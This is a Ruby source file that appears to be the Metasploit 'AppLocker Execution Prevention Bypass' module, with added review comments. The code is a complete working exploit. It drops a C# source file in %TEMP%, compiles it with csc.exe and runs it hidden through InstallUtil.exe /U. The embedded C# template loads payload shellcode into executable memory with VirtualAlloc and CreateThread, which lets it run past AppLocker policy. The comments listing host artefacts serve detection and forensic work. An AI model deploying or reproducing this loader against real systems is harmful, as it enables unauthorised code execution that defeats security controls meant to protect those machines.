GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/applocker_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File

  # Module metadata as read by the framework. Points worth noting when
  # reviewing this module: it runs only from a meterpreter session
  # ('SessionTypes'), depends on the stdapi_sys_process_execute command, and
  # declares both x86 and x64 payloads for the Windows platform.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AppLocker Execution Prevention Bypass',
        'Description' => %q{
This module will generate a .NET service executable on the target and utilize
InstallUtil to run the payload bypassing the AppLocker protection.

Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
        'License' => MSF_LICENSE,
        'Author' => [
          'Casey Smith', # Original AppLocker bypass research
          'OJ Reeves' # MSF module
        ],
        'Platform' => [ 'win' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [ [ 'Windows', {} ] ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-08-03',
        'References' => [
          ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
        ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Run Method for when run command is issued.
  #
  # Rejects an x64 payload when the session-reported architecture does not
  # contain "64", prints the target's computer name, then hands off to the
  # only implemented technique (execute_installutil).
  #
  # @raise via fail_with(Failure::NoTarget) when an x64 payload is selected
  #   against a target whose sysinfo['Architecture'] does not mention 64
  def exploit
    # payload.arch.first is the selected payload's architecture;
    # sysinfo['Architecture'] is what the meterpreter session reports.
    if payload.arch.first == ARCH_X64 && sysinfo['Architecture'] !~ /64/
      fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
    end

    # sysinfo is only on meterpreter sessions
    # NOTE(review): sysinfo is already dereferenced unguarded in the check above,
    # and 'SessionTypes' limits this module to meterpreter, so this nil guard
    # is effectively redundant; it is left as-is.
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    execute_installutil
  end

  # Carries out the InstallUtil technique end to end. Host-side artefacts this
  # code produces, relevant for detection engineering and forensic review:
  #   * a randomly named .cs file and .exe file written under %TEMP% (both are
  #     registered for cleanup, so they may no longer exist afterwards);
  #   * csc.exe from the chosen .NET Framework directory compiling a source
  #     file in %TEMP% into an executable in %TEMP% (/target:winexe);
  #   * InstallUtil.exe from that same directory started as a hidden process
  #     with "/logfile= /LogToConsole=false /U <exe in TEMP>"; the /U switch
  #     is what reaches the Uninstall override emitted by generate_csharp_source.
  def execute_installutil
    # Resolve %TEMP% and %windir% on the target.
    envs = get_envs('TEMP', 'windir')

    dotnet_path = get_dotnet_path(envs['windir'])
    print_status("Using .NET path #{dotnet_path}")

    # Random 8-letter basenames, so the dropped files carry no fixed name.
    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

    print_status("Writing payload to #{cs_path}")
    write_file(cs_path, generate_csharp_source)
    register_files_for_cleanup(cs_path)

    print_status("Compiling payload to #{exe_path}")
    csc_path = "#{dotnet_path}\\csc.exe"
    # csc's /platform value follows the payload arch; anything other than x86 is
    # treated as x64 (the module declares only those two architectures).
    csc_platform = payload.arch.first == ARCH_X86 ? ARCH_X86 : ARCH_X64
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
    # NOTE(review): the output/result of cmd_exec is discarded here, so a
    # compile failure is not detected at this point.
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

    print_status("Executing payload ...")
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
    # 'Hidden' => true: the process is started without a visible window.
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", { 'Hidden' => true })
    register_files_for_cleanup(exe_path)
  end

  # Locates a .NET Framework version directory that contains InstallUtil.exe.
  #
  # Looks under <windir>\Microsoft.NET\Framework for an x86 payload, or
  # ...\Framework64 otherwise; keeps directory entries starting with 'v'
  # (the versioned subdirectories) and walks them in reverse listing order,
  # returning the first one that is a directory holding InstallUtil.exe.
  #
  # @param windir [String] value of %windir% on the target
  # @return [String] full path of the selected Framework version directory
  # @raise via fail_with(Failure::NotVulnerable) when no candidate is found
  def get_dotnet_path(windir)
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == ARCH_X86 ? '' : '64'}"
    # dir() lists base_path on the target; 'v'-prefixed entries are the
    # version folders.
    paths = dir(base_path).select { |p| p[0] == 'v' }
    dotnet_path = nil

    # Reverse listing order — presumably so the highest version is tried first
    # when dir() returns names in ascending order; that ordering guarantee is
    # not visible here.
    paths.reverse.each do |p|
      path = "#{base_path}\\#{p}"
      if directory?(path) && file?("#{path}\\InstallUtil.exe")
        dotnet_path = path
        break
      end
    end

    unless dotnet_path
      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
    end

    dotnet_path
  end

  # Builds the C# source text that is written to the target and compiled
  # by csc.
  #
  # The payload bytes (payload.encoded) are rendered as a comma-separated list
  # of 0x.. literals and interpolated into the byte[] inside Uninstall. The
  # resulting assembly has an empty Main, so executing the .exe directly does
  # nothing; the payload runs from the RunInstaller-attributed class's
  # Uninstall override, which is the entry point InstallUtil reaches when
  # invoked with /U (see execute_installutil). Uninstall allocates memory via
  # VirtualAlloc with PAGE_EXECUTE_READWRITE, copies the bytes in, starts them
  # on a new thread and waits on it with INFINITE.
  #
  # The %Q^...^ block below is a runtime string and is reproduced exactly as
  # written; do not edit its contents casually.
  #
  # @return [String] the C# source text
  def generate_csharp_source
    # One "0x.." literal per payload byte, joined for the C# array initializer.
    sc = payload.encoded.each_byte.map { |b| "0x#{b.to_s(16)}" }.join(',')
    cs = %Q^
using System;

namespace Pop
{
public class Program { public static void Main() { } }

[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^

    cs
  end
end